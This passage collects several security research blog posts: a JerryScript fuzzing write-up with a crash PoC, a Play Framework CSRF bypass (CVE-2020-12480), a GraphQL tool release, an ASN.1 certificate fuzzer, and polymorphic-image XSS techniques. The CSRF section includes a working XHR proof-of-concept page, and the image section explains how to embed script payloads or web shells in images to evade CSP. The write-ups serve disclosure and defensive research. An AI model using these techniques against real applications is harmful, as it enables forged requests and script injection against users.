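            new_edges += bin(fresh).count("1")
            self.total[i] |= byte
            self.current[i] = 0
        return new_edges
```

A sample that returns a non-zero count from `finish_sample()` reached code no earlier sample did, which is the signal a coverage-guided fuzzer uses to keep it.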

Generation

We are not going to repeat the program generation algorithms, as they are closely described in the thesis. The surprising fact is that all the programs stem from this simple JavaScript by cleverly applying multiple mutators:

Object()

Integration with JerryScript

To add a new target, several modifications for Fuzzilli should be implemented. From a high level, the REPRL pseudocode is described here.

As we already mentioned, the JavaScript engine must be modified to conform to Fuzzilli’s protocol. To keep the same code standards and logic, we recommend adding a custom command line parameter to the engine. If we decide to run the interpreter without it, it will run normally. Otherwise, it uses the hardcoded descriptor numbers to let the parent know that the interpreter is ready to process our input.

Fuzzilli internally uses a custom command, by default called fuzzilli, which the interpreter should also implement. The first parameter represents the operator - it could be FUZZILLI_CRASH or FUZZILLI_PRINT. The former is used to check if we can intercept the segmentation faults, while the latter (optional) is used to print the output passed as an argument. By design, the fuzzer prevents execution when some checks fail, e.g., the operation FUZZILLI_CRASH is not implemented.

The code is very similar between different targets, as you can see in the patch for JerryScript that we submitted.

For a basic setup, one needs to write a short profile file stored in Sources/FuzzilliCli/Profiles/. Here we can specify additional builtins specific to the engine, arguments, or, thanks to the recent contribution from WilliamParks, the ECMAScriptVersion.

Results

By integrating Fuzzilli with JerryScript, Doyensec was able to identify multiple bugs reported over the course of four weeks through GitHub. All of these issues were fixed.

All issues were also added to the Fuzzilli Bug Showcase.

Fuzzilli is by design efficient against targets with JIT compilers. It can abuse the non-linear execution flow by generating nested callbacks, Prototypes or Proxy objects, where the state of a different object could be modified. Samples produced by Fuzzilli are specifically generated to incorporate these properties, as required for the discovery of type confusion bugs.

This behavior could be easily seen in the Issue #3836. As in most cases, the proof of concept generated by Fuzzilli is very simple:

function main() {
var v3 = new Float64Array(6);
var v4 = v3.buffer;
v4.constructor = Uint8Array;
var v5 = new Float64Array(v3);
}
main();

This could be rewritten without changing the semantics to an even simpler code:

var v1 = new Float64Array(6);
v1.buffer.constructor = Uint8Array;
new Float64Array(v1);

The root cause of this issue is described in the fix.

In JavaScript when a typed array like Float64Array is created, a raw binary data buffer could be accessed via the buffer property, represented by the ArrayBuffer type. However, the type was later altered to typed array view Uint8Array. During the initialization, the engine was expecting an ArrayBuffer instead of the typed array. When calling the ecma_arraybuffer_get_buffer function, the typed array pointer was cast to ArrayBuffer. Note that this is possible since the production build’s asserts are removed. This caused the type confusion bug on line 196.

Consequently, the destination buffer dst_buf_p contained an incorrect pointer, as we can see the memory corruption from the triage via gdb:

Program received signal SIGSEGV, Segmentation fault.
ecma_typedarray_create_object_with_typedarray (typedarray_id=ECMA_FLOAT64_ARRAY, element_size_shift=<optimized out>, proto_p=<optimized out>, typedarray_p=0x5555556bd408 <jerry_global_heap+480>)
    at /home/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:655
655	    memcpy (dst_buf_p, src_buf_p, array_length << element_size_shift);
(gdb) x/i $rip
=> 0x55555557654e <ecma_op_create_typedarray+346>:	rep movsb %ds:(%rsi),%es:(%rdi)
(gdb) i r rdi
rdi            0x3004100020008     844704103137288
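
The value in rdi does not look like a heap address; it looks like several small fields read as one 64-bit pointer. The sketch below illustrates that effect with a hypothetical header of four 16-bit fields. The layout and field values are chosen only so that the result matches the register value above; they are not JerryScript's actual object layout:

```python
import struct

# Hypothetical object header: four little-endian 16-bit fields.
header = struct.pack("<4H", 0x0008, 0x0002, 0x0041, 0x0003)

# The same eight bytes, read back as a little-endian 64-bit pointer.
(bogus_pointer,) = struct.unpack("<Q", header)
print(hex(bogus_pointer))
```

Passing such a value to memcpy as the destination is consistent with the segmentation fault shown in the gdb session.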

Some of the issues, including the one mentioned above, could probably be escalated from Denial of Service to Code Execution. Because of time constraints and the little added value, we have not tried to implement a working exploit.

I want to thank Saelo for including my JerryScript patch into Fuzzilli. And many thanks to Doyensec for the funded 25% research time, which made this project possible.


CSRF Protection Bypass in Play Framework

2020-08-20T00:00:00+02:00

This blog post illustrates a vulnerability affecting the Play framework that we discovered during a client engagement. This issue allows a complete Cross-Site Request Forgery (CSRF) protection bypass under specific configurations.

In their own words, the Play Framework is a high velocity web framework for Java and Scala. It is built on Akka, which is a toolkit for building highly concurrent, distributed, and resilient message-driven applications for Java and Scala.

Play is a widely used framework and is deployed on web platforms for both large and small organizations, such as Verizon, Walmart, The Guardian, LinkedIn, Samsung and many others.

Old school anti-CSRF mechanism

In older versions of the framework, CSRF protection was provided by an insecure baseline mechanism, even when CSRF tokens were not present in the HTTP requests.

This mechanism was based on the basic differences between Simple Requests and Preflighted Requests. Let’s explore the details of that.

A Simple Request has a strict ruleset. Whenever these rules are followed, the user agent (e.g. a browser) won’t issue an OPTIONS request, even if the request is made through XMLHttpRequest. All rules and details can be seen on this Mozilla Developer page, although we are primarily interested in the Content-Type ruleset.

The Content-Type header for simple requests can contain one of three values:

application/x-www-form-urlencoded
multipart/form-data
text/plain

If you specify a different Content-Type, such as application/json, then the browser will send an OPTIONS request to verify that the web server allows such a request.
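
The Content-Type part of this rule can be sketched as a small classifier. It looks only at the media type and deliberately ignores the other conditions browsers apply (request method, additional headers), so treat it as an illustration rather than a full model; the function names are ours:

```python
SIMPLE_CONTENT_TYPES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}


def media_type(content_type: str) -> str:
    """Return the lowercased type/subtype, ignoring parameters such as boundary."""
    return content_type.split(";", 1)[0].strip().lower()


def triggers_preflight(content_type: str) -> bool:
    """True if this Content-Type alone would make the request non-simple."""
    return media_type(content_type) not in SIMPLE_CONTENT_TYPES
```

Note that parameters after the semicolon do not influence the decision, so a multipart/form-data request stays simple regardless of its boundary value.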

Now that we understand the differences between preflighted and simple requests, we can continue onwards to understand how Play used to protect against CSRF attacks.

In older versions of the framework (up to and including version 2.5), a black-list approach on received Content-Type headers was used as a CSRF prevention mechanism.

In the 2.8.x migration guide, we can see how users could restore Play’s old default behavior if required by legacy systems or other dependencies:

application.conf

play.filters.csrf {
  header {
    bypassHeaders {
      X-Requested-With = "*"
      Csrf-Token = "nocheck"
    }
    protectHeaders = null
  }
  bypassCorsTrustedOrigins = false
  method {
    whiteList = []
    blackList = ["POST"]
  }
  contentType.blackList = ["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]
}

In the snippet above we can see the core of the old protection. The contentType.blackList setting contains three values, which are identical to the content types of “simple requests”. This was considered a valid (although not ideal) protection, since the following scenarios are prevented:

attacker.com embeds a <form> element which posts to victim.com
- Form allows form-urlencoded, multipart or plain, which are all blocked by the mechanism
attacker.com uses XHR to POST to victim.com with application/json
- Since application/json is not a “simple request”, an OPTIONS will be sent and (assuming a proper configuration) CORS will block the request
victim.com uses XHR to POST to victim.com with application/json
- This works as it should, since the request is not cross-site but within the same domain

Hence, you now have CSRF protection. Or do you?

Looking for a bypass

Armed with this knowledge, the first thing that comes to mind is that we need to make the browser issue a request that does not trigger a preflight and that does not match any values in the contentType.blackList setting.

The first thing we did was map out requests that we could modify without sending an OPTIONS preflight. This came down to a single request: Content-Type: multipart/form-data

This appeared immediately interesting thanks to the boundary value: Content-Type: multipart/form-data; boundary=something

The description can be found here:

For multipart entities the boundary directive is required, which consists of 1 to 70 characters from a set of characters known to be very robust through email gateways, and not ending with white space. It is used to encapsulate the boundaries of the multiple parts of the message. Often, the header boundary is prepended with two dashes and the final boundary has two dashes appended at the end.

So, we have a field that can actually be modified with plenty of different characters and it is all attacker-controlled.

Now we need to dig deep into the parsing of these headers. In order to do that, we need to take a look at Akka HTTP which is what the Play framework is based on.

Looking at HttpHeaderParser.scala, we can see that these headers are always parsed:

private val alwaysParsedHeaders = Set[String](
    "connection",
    "content-encoding",
    "content-length",
    "content-type",
    "expect",
    "host",
    "sec-websocket-key",
    "sec-websocket-protocol",
    "sec-websocket-version",
    "transfer-encoding",
    "upgrade"
)

And the parsing rules can be seen in HeaderParser.scala which follows RFC 7230 Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing, June 2014.

def `header-field-value`: Rule1[String] = rule {
  FWS ~ clearSB() ~ `field-value` ~ FWS ~ EOI ~ push(sb.toString)
}
def `field-value` = {
  var fwsStart = cursor
  rule {
    zeroOrMore(`field-value-chunk`).separatedBy { // zeroOrMore because we need to also accept empty values
      run { fwsStart = cursor } ~ FWS ~ &(`field-value-char`) ~ run { if (cursor > fwsStart) sb.append(' ') }
    }
  }
}
def `field-value-chunk` = rule { oneOrMore(`field-value-char` ~ appendSB()) }
def `field-value-char` = rule { VCHAR | `obs-text` }
def FWS = rule { zeroOrMore(WSP) ~ zeroOrMore(`obs-fold`) }
def `obs-fold` = rule { CRLF ~ oneOrMore(WSP) }

If these parsing rules are not obeyed, the value will be set to None. Perfect! That is exactly what we need for bypassing the CSRF protection - a “simple request” that will then be set to None thus bypassing the blacklist.
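
The logic flaw can be modelled in a few lines. This is a toy model under our own assumptions: the parser below is a stand-in that rejects any parameter lacking a name=value shape, and it is neither Akka HTTP's grammar nor Play's filter code:

```python
from typing import Optional

BLACKLIST = {"application/x-www-form-urlencoded", "multipart/form-data", "text/plain"}


def parse_content_type(raw: str) -> Optional[str]:
    """Toy strict parser: return the media type, or None if a parameter is malformed."""
    media_type, *params = [part.strip() for part in raw.split(";")]
    for param in params:
        name, sep, value = param.partition("=")
        if not sep or not name or not value:
            return None  # stands in for the "illegal header" outcome
    return media_type.lower()


def csrf_check_required(raw_content_type: str) -> bool:
    """Black-list check: only listed content types are subject to the CSRF check."""
    parsed = parse_content_type(raw_content_type)
    return parsed in BLACKLIST  # None is never in the black-list
```

A well-formed multipart/form-data header is subject to the check, while a header that fails to parse yields None, matches nothing in the black-list, and skips it.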

How do we actually forge a request that is allowed by the browser, but is considered invalid by the Akka HTTP parsing code?

We decided to let fuzzing answer that, and quickly discovered that the following transformation worked: Content-Type: multipart/form-data; boundary=---some;randomboundaryvalue

An extra semicolon inside the boundary value would do the trick and mark the request as illegal:

POST /count HTTP/1.1
Host: play.local:9000
...
Content-Type: multipart/form-data;boundary=------;---------------------139501139415121
Content-Length: 0

Response:

HTTP/1.1 200 OK
...
Content-Type: text/plain; charset=UTF-8
Content-Length: 1

5

This is also confirmed by looking at the logs of the server in development mode:

a.a.ActorSystemImpl - Illegal header: Illegal 'content-type' header: Invalid input 'EOI', exptected tchar, OWS or ws (line 1, column 74): multipart/form-data;boundary=------;---------------------139501139415121

And by instrumenting the Play framework code to print the value of the Content-Type:

Content-Type: None

Finally, we built the following proof-of-concept and notified our client (along with the Play framework maintainers):

<html>
    <body>
        <h1>Play Framework CSRF bypass</h1>
        <button type="button" onclick="poc()">PWN</button>
        <p id="demo"></p>
        <script>
        function poc() {
            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    document.getElementById("demo").innerHTML = this.responseText; 
                } 
            };
            xhttp.open("POST", "http://play.local:9000/count", true);
            xhttp.setRequestHeader(
                "Content-type",
                "multipart/form-data; boundary=------;---------------------139501139415121"
            );
            xhttp.withCredentials = true;
            xhttp.send("");
        }
        </script>
    </body>
</html>

Credits & Disclosure

This vulnerability was discovered by Kevin Joensen and reported to the Play framework via security@playframework.com on April 24, 2020. This issue was fixed in Play 2.8.2 and 2.7.5. CVE-2020-12480 and all details were published by the vendor on August 10, 2020. Thanks to James Roper of Lightbend for the assistance.

InQL Scanner v2 is out!

2020-06-11T00:00:00+02:00

InQL dyno-mites release

After the public launch of InQL, we received an overwhelming response from the community. We’re excited to announce a new major release, available on GitHub. In this version (codenamed dyno-mites), we have introduced a few cool features and a new logo!

Jython Standalone GUI

As you might know, InQL can be used as a stand-alone tool, or as a Burp Suite extension (available for both Professional and Community editions). Using GraphQL’s built-in introspection query, the tool collects queries, mutations, subscriptions, fields, arguments, etc. to automatically generate query templates that can be used for QA / security testing.

In this release, we introduced a Jython standalone GUI similar to the one in Burp:

$ brew install jython
$ jython -m pip install inql
$ jython -m inql

Advanced Query Editor

Many users have asked for syntax highlighting and code completion. Et Voila!

InQL v2 includes an embedded GraphiQL server. This server works as a proxy and handles all the requests, enhancing them with authorization headers. GraphiQL server improves the overall InQL experience by providing an advanced query editor with autocompletion and other useful features. We also introduced stubbing of introspection queries when introspection is not available.

We imagine people working between GraphiQL, InQL and other Burp Suite tools, hence we included a custom “Send to GraphiQL” / “Send To Repeater” flow to move queries back and forth between the tools.

Tabbed Editor with Multi-Query and Variables support

But that’s not all. On the Burp Suite extension side, InQL now handles batched queries and supports searching inside queries.

This was possible through re-engineering the editor in use (e.g. the default Burp text editor) and including a new tabbed interface able to sync between multiple representations of these queries.

BApp Store

Finally, InQL is now available on the Burp Suite’s BApp store so that you can easily install the extension from within Burp’s extension tab.

Stay tuned!

In just three months, InQL has become the go-to utility for GraphQL security testing. We received a lot of positive feedback and decided to double down on the development. We will keep improving the tool based on users’ feedback and the experience we gain through our GraphQL security testing services.

This project was crafted with love in the Doyensec Research Island.

Fuzzing TLS certificates from their ASN.1 grammar

2020-05-14T00:00:00+02:00

A good part of my research time at Doyensec was devoted to building a flexible ASN.1 grammar-based fuzzer for testing TLS certificate parsers. I learned a lot in the process, but I often struggled to find good resources on these topics. In this blogpost I want to give a high-level overview of the problem, the approach I’m taking, and some pointers which might hopefully save a little time for other fellow security researchers.

Let’s start with some basics.

What is a TLS certificate?

A TLS certificate is a DER-encoded object conforming to the ASN.1 grammar and constraints defined in RFC 5280, which is based on the ITU X.509 standard.

That’s a lot of information to unpack, so let’s take it one piece at a time.

ASN.1

ASN.1 (Abstract Syntax Notation One) is a grammar used to define abstract objects. You can think of it as a much older and more complicated version of Protocol Buffers. ASN.1 however does not define an encoding, which is left to other standards. This language was designed by ITU and it is extremely powerful and general purpose.

This is how a message in a chat protocol might be defined:

Message ::= SEQUENCE {
    senderId     INTEGER,
    recipientId  INTEGER,
    message      UTF8String,
    sendTime     GeneralizedTime,
    ...
}

At first sight, ASN.1 might even seem quite simple and intuitive. But don’t be fooled! ASN.1 contains a lot of vestigial and complex features. For a start, it has ~13 string types. Constraints can be placed on fields: for instance, integer values and string sizes can be restricted to an acceptable range.

The real complexity beasts however are information objects, parametrization and tabular constraints. Information objects allow the definition of templates for data types and a grammar to declare instances of that template (oh yeah…defining a grammar within a grammar!).

This is how a template for different message types could be defined:

-- Definition of the MESSAGE-CLASS information object class
MESSAGE-CLASS ::= CLASS {
    &messageTypeId INTEGER UNIQUE,
    &payload      [1] OPTIONAL,
    ...
}
WITH SYNTAX {
    MESSAGE-TYPE-ID  &messageTypeId
    [PAYLOAD    &payload]
}

-- Definition of some message types
TextMessageKinds MESSAGE-CLASS ::= {
    -- Text message
    {MESSAGE-TYPE-ID 0, PAYLOAD UTF8String}
    -- Read ACK (no payload)
  | {MESSAGE-TYPE-ID 1, PAYLOAD Sequence { ToMessageId INTEGER } }
}

MediaMessageKinds MESSAGE-CLASS ::= {
    -- JPEG
    {MESSAGE-TYPE-ID 2, PAYLOAD OctetString}
}

Parametrization allows the introduction of parameters in the specification of a type:

Message {MESSAGE-CLASS : MessageClass} ::= SEQUENCE {
    messageId     INTEGER,
    senderId      INTEGER,
    recipientId   INTEGER,
    sendTime      GeneralizedTime,
    messageTypeId MESSAGE-CLASS.&messageTypeId ({MessageClass}),
    payload       MESSAGE-CLASS.&payload ({MessageClass} {@messageTypeId})
}

While a complete overview of the format is not within the scope of this post, a very good entry-level, but quite comprehensive, resource I found is this ASN1 Survival guide. The nitty-gritty details can be found in the ITU standards X.680 to X.683.

Powerful as it may be, ASN.1 suffers from a large practical problem: it lacks a wide choice of compilers (parser generators), especially non-commercial ones. Most of them do not implement advanced features like information objects. This means that more often than not, data structures defined using ASN.1 are serialized and deserialized by handcrafted code instead of an autogenerated parser. This is also true for many libraries handling TLS certificates.

DER

DER (Distinguished Encoding Rules) is an encoding used to translate an ASN.1 object into bytes. It is a simple Tag-Length-Value format: each element is encoded by concatenating its type (tag), the length of the payload, and the payload itself. Its rules ensure there is only one valid representation for any given object, a useful property when dealing with digital certificates that must be signed and checked for anomalies.

The details of how DER works are not relevant to this post. A good place to start is here.
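
Still, a few lines of Python are enough to get a feel for the Tag-Length-Value layout. The following is a minimal sketch covering only INTEGER and SEQUENCE with single-byte tags; the helper names (`der_length`, `der_tlv`, `der_integer`, `der_sequence`) are made up for this example and do not come from any library.

```python
def der_length(n: int) -> bytes:
    """Encode a payload length using DER's short or long form."""
    if n < 0x80:
        return bytes([n])  # short form: the length fits in one byte
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body  # long form: count byte + length bytes


def der_tlv(tag: int, payload: bytes) -> bytes:
    """Concatenate tag, length and value into one DER element."""
    return bytes([tag]) + der_length(len(payload)) + payload


def der_integer(value: int) -> bytes:
    """Encode an INTEGER (tag 0x02) as minimal two's complement."""
    magnitude = value if value >= 0 else ~value
    size = magnitude.bit_length() // 8 + 1  # leaves room for the sign bit
    return der_tlv(0x02, value.to_bytes(size, "big", signed=True))


def der_sequence(*elements: bytes) -> bytes:
    """Wrap already-encoded elements in a SEQUENCE (tag 0x30)."""
    return der_tlv(0x30, b"".join(elements))


print(der_integer(5).hex())                                  # 020105
print(der_sequence(der_integer(1), der_integer(128)).hex())  # 300702010102020080
```

Note how 128 needs a leading zero byte (`00 80`): without it, the top bit would mark the value as negative. Always picking the shortest form is what gives DER its single valid representation per value.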

RFC 5280 and X.509

The format of the digital certificates used in TLS is defined in some RFCs, most importantly RFC 5280 (and then in RFC 5912, updated for ASN.1 2002). The specification is based on the ITU X.509 standard.

This is what the outermost layer of a TLS certificate contains:

Certificate  ::=  SEQUENCE  {
    tbsCertificate       TBSCertificate,
    signatureAlgorithm   AlgorithmIdentifier,
    signature            BIT STRING  
}

TBSCertificate  ::=  SEQUENCE  {
    version         [0]  Version DEFAULT v1,
    serialNumber         CertificateSerialNumber,
    signature            AlgorithmIdentifier,
    issuer               Name,
    validity             Validity,
    subject              Name,
    subjectPublicKeyInfo SubjectPublicKeyInfo,
    issuerUniqueID  [1]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    subjectUniqueID [2]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    extensions      [3]  Extensions OPTIONAL
                         -- If present, version MUST be v3 --
}

You may recognize some of these fields from inspecting a certificate using a browser integrated viewer.

Finding out what exactly should go inside a TLS certificate and how it should be interpreted was not an easy task - specifications were scattered inside a lot of RFCs and other standards, sometimes with partial or even conflicting information. Some documents from the recent past offer a good insight into the number of contradictory interpretations. Nowadays there seems to be more convergence, and a good place to start when looking for how a TLS certificate should be handled is the RFCs together with a couple of widely used TLS libraries.

Fuzzing TLS starting from ASN.1

Previous work

All the high profile TLS libraries include some fuzzing harnesses directly in their source tree and most are even continuously fuzzed (like LibreSSL which is now included in oss-fuzz thanks to my colleague Andrea). Most libraries use tried-and-tested fuzzers like AFL or libFuzzer, which are not encoding or syntax aware. This very likely means that many cycles are wasted generating and testing inputs which are rejected early by the parsers.

X.509 parsers have been fuzzed using many approaches. Frankencert, for instance, generates certificates by combining parts from existing ones, while CertificateFuzzer uses a hand-coded grammar. Some fuzzing efforts are more targeted towards discovering memory-corruption types of bugs, while others are more geared towards discovering logic bugs, often comparing the behavior of multiple parsers side by side to detect inconsistencies.

ASN1Fuzz

I wanted a tool capable of generating valid inputs from an ASN.1 grammar, so that I can slightly break them and hopefully find some vulnerabilities. I couldn’t find any tool accepting ASN.1 grammars, so I decided to build one myself.

After a lot of experimentation and three full rewrites, I have a pipeline that generates valid X.509 certificates. It looks like this:

     +-------+
     | ASN.1 |
     +---+---+
         |
      pycrate
         |
 +-------v--------+        +--------------+
 | Python classes |        |  User Hooks  |
 +-------+--------+        +-------+------+
         |                         |
         +-----------+-------------+
                     |
                 Generator
                     |
                     |
                 +---v---+
                 |       |
                 |  AST  |
                 |       |
                 +---+---+
                     |
                  Encoder
                     |
               +-----v------+
               |            |
               |   Output   |
               |            |
               +------------+

First, I compile the ASN.1 grammar using pycrate, one of the few FOSS compilers that support most of the advanced features of ASN.1.

The output of the compiler is fed into the Generator. With a lot of introspection inside the pycrate classes, this component generates random ASTs conforming to the input grammar. The ASTs can be fed to an encoder (e.g. DER) to create a binary output suitable for being tested with the target application.

Certificates produced like this would not be valid, because many constraints are not encoded in the syntax. Moreover, I wanted to give the user total freedom to manipulate the generator behavior. To solve this problem I developed a handy hooking system which allows overrides at any point in the generator:

import random
import time

from pycrate_asn1dir.X509_2016 import AuthenticationFramework
from generator import Generator

spec = AuthenticationFramework.Certificate
cert_generator = Generator(spec)

@cert_generator.value_hook("Certificate/toBeSigned/validity/notBefore/.*")
def generate_notBefore(generator: Generator, node):
    now = int(time.time())
    start = now - 10 * 365 * 24 * 60 * 60  # 10 years ago
    return random.randint(start, now)

@cert_generator.node_hook("Certificate/toBeSigned/extensions/_item_[^/]*/" \
                          "extnValue/ExtnType/_cont_ExtnType/keyIdentifier")
def force_akid_generation(generator: Generator, node):
    # keyIdentifier should be present unless the certificate is self-signed
    return generator.generate_node(node, ignore_hooks=True)

@cert_generator.value_hook("Certificate/signature")
def generate_signature(generator: Generator, node):
    # (... compute signature ...)
    return (sig, siglen)
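
For readers wondering how such path-based hooks can be wired up, here is one possible sketch. It is not the ASN1Fuzz implementation: `HookRegistry`, `lookup` and `generate` are hypothetical names, and the only idea illustrated is matching a regular expression against the path of the node being generated.

```python
import re
from typing import Any, Callable, List, Optional, Tuple

Hook = Callable[[Any], Any]


class HookRegistry:
    """Maps regular expressions over node paths to override functions."""

    def __init__(self) -> None:
        self._hooks: List[Tuple[re.Pattern, Hook]] = []

    def value_hook(self, pattern: str) -> Callable[[Hook], Hook]:
        """Decorator that registers `func` for every path matching `pattern`."""
        compiled = re.compile(pattern)

        def decorator(func: Hook) -> Hook:
            self._hooks.append((compiled, func))
            return func

        return decorator

    def lookup(self, path: str) -> Optional[Hook]:
        """Return the first registered hook whose pattern matches the whole path."""
        for compiled, func in self._hooks:
            if compiled.fullmatch(path):
                return func
        return None

    def generate(self, path: str, default: Hook, node: Any = None) -> Any:
        """Use the hook when one matches, otherwise fall back to `default`."""
        hook = self.lookup(path)
        return (hook or default)(node)


registry = HookRegistry()


@registry.value_hook("Certificate/toBeSigned/validity/notBefore/.*")
def fixed_not_before(node: Any) -> int:
    return 1577836800  # hypothetical fixed timestamp (2020-01-01 UTC)


print(registry.generate("Certificate/toBeSigned/validity/notBefore/utcTime", lambda n: 0))
print(registry.generate("Certificate/serialNumber", lambda n: 42))
```

Keeping the hooks outside the generator means the random generation logic stays generic, while protocol-specific knowledge lives in small, independent functions.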

The AST generated by this pipeline can already be used for differential testing. For instance, if a library accepts the certificate while others don’t, there may be a problem that requires manual investigation.
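
The comparison step of such a differential test is simple to express. The sketch below assumes each parser is wrapped in a Python callable that raises an exception on rejection; `strict_parser` and `lenient_parser` are toy stand-ins invented for this example, not real TLS libraries.

```python
from typing import Callable, Dict

Parser = Callable[[bytes], object]


def collect_verdicts(der: bytes, parsers: Dict[str, Parser]) -> Dict[str, bool]:
    """Record, for every parser, whether it accepted the input."""
    verdicts = {}
    for name, parse in parsers.items():
        try:
            parse(der)
            verdicts[name] = True
        except Exception:
            verdicts[name] = False
    return verdicts


def is_inconsistent(verdicts: Dict[str, bool]) -> bool:
    """True when at least one parser disagrees with the others."""
    return len(set(verdicts.values())) > 1


# Toy stand-ins: one insists on an outer SEQUENCE tag, the other accepts anything.
def strict_parser(der: bytes) -> bytes:
    if not der.startswith(b"\x30"):
        raise ValueError("not a SEQUENCE")
    return der


def lenient_parser(der: bytes) -> bytes:
    return der


parsers = {"strict": strict_parser, "lenient": lenient_parser}
verdicts = collect_verdicts(b"\x02\x01\x05", parsers)
print(verdicts, is_inconsistent(verdicts))
```

Inputs for which `is_inconsistent` returns True are the ones worth a manual look.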

In addition, the ASTs can be mutated using a custom mutator for AFL++ which performs random operations on the tree.

ASN1Fuzz is currently research-quality code, but I do aim at open sourcing it at some point in the future. Since the generation starts from ASN.1 grammars, the tool is not limited to generating TLS certificates, and it could be leveraged in fuzzing a plethora of other protocols.

Stay tuned for the next blog post where I will present the results from this research!

Researching Polymorphic Images for XSS on Google Scholar

2020-04-30T00:00:00+02:00

A few months ago I came across a curious design pattern on Google Scholar. Multiple screens of the web application were fetched and rendered using a combination of location.hash parameters and XHR to retrieve the supposed templating snippets from a relative URI, rendering them on the page unescaped.

This is not dangerous per se, unless the platform lets users upload arbitrary content and serve it from the same origin, which unfortunately Google Scholar does, given its image upload functionality.

While any penetration tester worth her salt would deem the exploitation of the issue trivial, Scholar’s image processing backend was applying different transformations to the uploaded images (i.e. stripping metadata and reprocessing the picture). When reporting the vulnerability, Google’s VRP team did not consider the upload of a polymorphic image carrying a valid XSS payload possible, and instead requested a PoC||GTFO.

Given the age of this technique, I first went through all past “well-known” techniques to generate polymorphic pictures, and then developed a test suite to investigate the behavior of some of the most popular libraries for image processing (i.e. ImageMagick, GraphicsMagick, Libvips). This effort led to the discovery of some interesting caveats. Some of these methods can also be used to conceal web shells or JavaScript content to bypass “self” CSP directives.

Payload in EXIF

The easiest approach is to embed our payload in the metadata of the image. In the case of JPEG/JFIF, these pieces of metadata are stored in application-specific markers (called APPX), but they are not taken into account by the majority of image libraries. Exiftool is a popular tool to edit those entries, but you may find that in some cases the characters will get entity-escaped, so I resorted to inserting them manually. In the hope that Google Scholar would preserve some whitelisted EXIF tags, I created an image with 1.2k common EXIF tags, including CIPA standard and non-standard tags.

While that didn’t work in my case, some EXIF entries are to this day preserved by many popular web platforms. In most of the image libraries tested, PNG metadata is always kept when converting from PNG to PNG, while it is always lost when converting from PNG to JPG.

Payload concatenated at the end of the image (after 0xFFD9 for JPGs or IEND for PNGs)

This technique will only work if no transformations are performed on the uploaded image, since image libraries process only the image content and drop anything that follows it.

As the name suggests, the trick involves appending the JavaScript payload at the end of the image format.
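
For JPEGs, this boils down to a plain byte concatenation after the End Of Image marker. The following sketch uses hypothetical helper names (`append_after_eoi`, `trailing_data`) and a toy byte string instead of a real picture. The second helper is handy for checking whether a processing pipeline kept or stripped the appended bytes.

```python
JPEG_EOI = b"\xff\xd9"  # End Of Image marker


def append_after_eoi(jpeg: bytes, payload: bytes) -> bytes:
    """Return the image with `payload` placed right after the EOI marker."""
    if not jpeg.endswith(JPEG_EOI):
        raise ValueError("expected the image to end with the EOI marker")
    return jpeg + payload


def trailing_data(jpeg: bytes) -> bytes:
    """Return whatever follows the last EOI marker (empty if nothing does).

    Simplification: a payload that itself contains 0xFFD9 would confuse
    this search.
    """
    end = jpeg.rfind(JPEG_EOI)
    return b"" if end == -1 else jpeg[end + len(JPEG_EOI):]


# Toy stand-in for a JPEG: SOI marker, filler bytes, EOI marker.
toy_image = b"\xff\xd8" + b"\x00" * 4 + JPEG_EOI
marked = append_after_eoi(toy_image, b"/* marker */")
print(trailing_data(toy_image), trailing_data(marked))
```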

Payload in PNG’s IDAT

In PNGs, the IDAT chunk stores the pixel information. Depending on the transformations applied, you may be able to directly insert your raw payload in the IDAT chunks or you may try to bypass the resize and re-sampling operations. Google Scholar only generated JPG pictures, so I could not leverage this technique.

Payload in JPG’s ECS

In the JFIF standard, the entropy-coded data segment (ECS) contains the raw Huffman-compressed bitstream representing the Minimum Coded Units (MCUs) that make up the image data. In theory, it is possible to position our payload in this segment, but there are no guarantees that our payload will survive the transformation applied by the image library on the server. Creating a JPG image resistant to the transformations caused by the library was a process of trial and error.

As a starting point I crafted a “base” image with the same quality factors as the images resulting from the conversion. For this I ended up using this image having 0-length-string EXIFs. Even though having the payload positioned at a variable offset from the beginning of the section did not work, I found that when processed by Google Scholar the first bytes of the image’s ECS section were kept if separated by a pattern of 0x00 and 0x14 bytes.

From here it took me a little time to find the right sequence of bytes allowing the payload to survive the transformation, since the majority of user agents did not tolerate low-value bytes in the script tag definition of the page. For anyone interested, we have made available the images embedding the onclick and mouseover events. Our image library test suite is available on GitHub as doyensec/StandardizedImageProcessingTest.

Timeline

[2019-09-28] Reported to Google VRP
[2019-09-30] Google’s VRP requested a PoC
[2019-10-04] Provided PoC #1
[2019-10-10] Google’s VRP requested a different payload for PoC
[2019-10-11] Provided PoC #2
[2019-11-05] Google’s VRP confirmed the issue in 2 endpoints, rewarded $6267.40
[2019-11-19] Google’s VRP found another XSS using the same technique, rewarded an additional $3133.70

LibreSSL and OSS-Fuzz

2020-04-08T00:00:00+02:00

The story of a fuzzing integration reward

In my first month at Doyensec I had the opportunity to bring together both my work and my spare time hobbies. I used the 25% research time offered by Doyensec to integrate the LibreSSL library into OSS-Fuzz. LibreSSL is an API compatible replacement for OpenSSL, and after the Heartbleed attack, it is considered a full-fledged replacement of OpenSSL on OpenBSD, macOS and Void Linux.

As part of this research, Google awarded us a $10,000 bounty, 100% of which was donated to the Cancer Research Institute. The fuzzer also discovered 14+ new vulnerabilities, four of which were directly related to memory corruption.

In the following paragraphs, we will walk through the process of porting a new project over to OSS-Fuzz, from following the community-provided steps all the way to the actual code porting. We will also show a vulnerability fixed in 136e6c997f476cc65e614e514ac3bf6ee54fc4b4.

commit 136e6c997f476cc65e614e514ac3bf6ee54fc4b4
Author: beck <>
Date:   Sat Mar 23 18:48:15 2019 +0000

    Add range checks to varios ASN1_INTEGER functions to ensure the
    sizes used remain a positive integer. Should address issue
    13799 from oss-fuzz
    ok tb@ jsing@

 src/lib/libcrypto/asn1/a_int.c    | 56 +++++++++++++++++++++++++++++++++++++++++++++++++++++---
 src/lib/libcrypto/asn1/tasn_prn.c |  8 ++++++--
 src/lib/libcrypto/bn/bn_lib.c     |  4 +++-
 3 files changed, 62 insertions(+), 6 deletions(-)

The FOSS historician blurry book

